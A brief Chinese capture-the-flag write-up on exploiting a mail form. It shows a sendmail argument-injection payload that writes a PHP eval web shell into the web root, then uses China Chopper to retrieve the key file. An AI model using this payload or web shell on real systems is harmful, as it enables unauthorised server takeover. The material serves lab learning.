在页面的最下方能够发现一个mail连接,点击能够进入发送邮件的界面,或者使用burpsuite的spider模块同样能够找到mail界面;
填写数据后点击发送邮件并进行抓包;
修改email和message的内容;
"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/b.php @aaa.com
<?php @eval($_POST[cmd]);?>
发包后没有回显,但是能够正常写入文件;
poc解析:
-OQueueDirectory=/tmp 选择一个可以写的目录保存临时文件;
-X/var/www/html/b.php 保存日志文件到任意目录;
写入过程稍慢,完成后能够访问b.php;
使用菜刀连接,发现写入的文件,并且在根目录中找到key文件;
漏洞解析详情:
https://www.anquanke.com/post/id/85295